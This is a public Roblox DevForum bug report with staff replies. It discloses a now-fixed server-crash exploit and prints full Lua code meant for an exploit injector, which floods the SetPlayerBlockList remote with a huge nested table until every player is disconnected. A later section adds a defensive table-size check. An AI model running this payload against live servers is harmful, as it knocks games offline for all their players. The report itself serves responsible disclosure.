Users can crash any Roblox server using this simple exploit

Reproduction Steps
(confidential)
Private Report:
https://devforum.roblox.com/t/crash-any-roblox-server-using-this-simple-exploit-bug-report/1780535

EDIT: Roblox has said this is fixed, so posting the original report here to the public:

This exploit works better in higher traffic servers (at least a few players, don't try it alone in your own server)

Run the following code on any exploit injector (worked using Synapse)

-- bypass
game:GetService("NetworkClient"):SetOutgoingKBPSLimit(math.huge)
local function getmaxvalue(val) --calculate maximum value
   local mainvalueifonetable = 4999999 --doing more per 1 table causes a kick
   if type(val) ~= "number" then
       return nil --we can't calculate if our value isn't a number, let's prevent an error from happening!
   end
   local calculateperfectval = (mainvalueifonetable/(val+2)) --+2 to calculate the spammed table (+1) which is in the main table (+1)
   return calculateperfectval --return the value.
end

local function bomb(tableincrease, tries) --thanks to syria for providing this function. (reestart)
 local maintable = {}
 local spammedtable = {}
 
 table.insert(spammedtable, {})
 z = spammedtable[1]
 
 for i = 1, tableincrease do
    local tableins = {}
    table.insert(z, tableins)
    z = tableins
 end --increases each with the parameter
 
 local calculatemax = getmaxvalue(tableincrease) --we increased tables, lets calculate the new maximum we're capable of using
 local maximum --setup the max we use after calculating
 
 if calculatemax then
     maximum = calculatemax
     else
     maximum = 4999999 --ok?
 end
 
 for i = 1, maximum do
     table.insert(maintable, spammedtable)
 end --pass each spammed table into main table

 for i = 1, tries do
     game.RobloxReplicatedStorage.SetPlayerBlockList:FireServer(maintable) --push a as a argument and fire for each try.
 end
end

bomb(296, 4) --fire the function or include it in an bot api

Behavior
Ping increases, then eventually the server drops connections with all of its players, giving the following message:
[images: unknown1, unknown2]

Issue Area: Engine
Issue Type: Crashing
Impact: Very High
Frequency: Constantly
Date First Experienced: 2022-05-04 14:05:00 (-04:00)

20 Likes
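
A server-side guard for a game's own RemoteEvent handlers, which bounds the nesting depth and entry count of a table argument before any other work is done on it. This is an added example, not code from the report or from Roblox; the limits and the `withinBudget` name are assumptions, and the crash reported above was in the engine itself (Issue Area: Engine), so it was Roblox's fix that resolved it, not a check like this one.

```lua
-- Added example. MAX_DEPTH and MAX_ENTRIES are assumed limits; tune per remote.
local MAX_DEPTH = 4
local MAX_ENTRIES = 1000

-- Returns true and the entry count when `root` fits the budget,
-- otherwise false and a reason. The walk is iterative, so deep nesting
-- cannot overflow the call stack, and it stops at the first violation.
-- A table reached through several references is counted each time.
local function withinBudget(root)
    if type(root) ~= "table" then
        return false, "not a table"
    end
    local stack = { { root, 1 } }
    local entries = 0
    while #stack > 0 do
        local item = table.remove(stack)
        local tbl, depth = item[1], item[2]
        if depth > MAX_DEPTH then
            return false, "nested too deeply"
        end
        for _, child in pairs(tbl) do
            entries = entries + 1
            if entries > MAX_ENTRIES then
                return false, "too many entries"
            end
            if type(child) == "table" then
                stack[#stack + 1] = { child, depth + 1 }
            end
        end
    end
    return true, entries
end

-- Constructed sample inputs (not taken from the report).
local flatList = { 101, 202, 303 }   -- the shape a handler expects: a short id list
local chain = {}                     -- 20 levels of nesting
local tip = chain
for _ = 1, 20 do local nxt = {}; tip[1] = nxt; tip = nxt end
local wide = {}                      -- 5000 references to one shared table
local shared = { {} }
for i = 1, 5000 do wide[i] = shared end

print("flat list:", withinBudget(flatList))
print("deep chain:", withinBudget(chain))
print("wide table:", withinBudget(wide))
```

In a server script the check would run first in an `OnServerEvent` handler, with the call dropped (and ideally counted per player) when it returns false.
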

Thank you for the report.
We were able to reproduce the issue and will be fixing this.

9 Likes

Just circling back here, this is fixed! Gonna close it out.

1 Like